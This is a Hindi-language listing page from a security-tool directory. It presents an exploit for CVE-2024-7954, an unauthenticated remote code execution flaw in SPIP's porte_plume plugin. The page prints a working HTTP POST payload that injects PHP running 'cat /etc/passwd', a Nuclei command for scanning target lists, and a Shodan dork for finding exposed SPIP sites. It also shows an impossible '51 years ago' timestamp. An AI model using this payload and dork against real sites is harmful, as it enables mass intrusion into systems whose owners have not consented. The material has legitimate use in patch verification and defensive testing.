Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RCE_CVE-2024-7954 — CVE-2024-7954 के लिए शोषण, SPIP के porte_plume प्लगइन में बिना प्रमाणीकरण के रिमोट कोड निष्पादन, पहचान के लिए Nuclei टेम्पलेट और Shodan डॉर्क के साथ। | Kitploit
उपकरण/GitHubGitHub/thecyberguy-17/rce_cve-2024-7954
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubthecyberguy-17/rce_cve-2024-7954

RCE_CVE-2024-7954

CVE-2024-7954 के लिए शोषण, SPIP के porte_plume प्लगइन में बिना प्रमाणीकरण के रिमोट कोड निष्पादन, पहचान के लिए Nuclei टेम्पलेट और Shodan डॉर्क के साथ।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

RCE_CVE-2024-7954

विवरण:

SPIP द्वारा 4.30-alpha2, 4.2.13, और 4.1.16 से पहले उपयोग किया गया porte_plume प्लगइन एक मनमाना कोड निष्पादन भेद्यता के लिए असुरक्षित है। एक दूरस्थ और अप्रमाणित हमलावर एक क्राफ्टेड HTTP अनुरोध भेजकर SPIP उपयोगकर्ता के रूप में मनमाना PHP निष्पादित कर सकता है। (गंभीर)

शोषण:

POST /index.php?action=porte_plume_previsu HTTP/1.1

Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

उपयोग किया गया उपकरण:

Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml

Shodan Dork:

app="SPIP"

संदर्भ:

1) https://github.com/fa-rrel
टूल डाउनलोड करें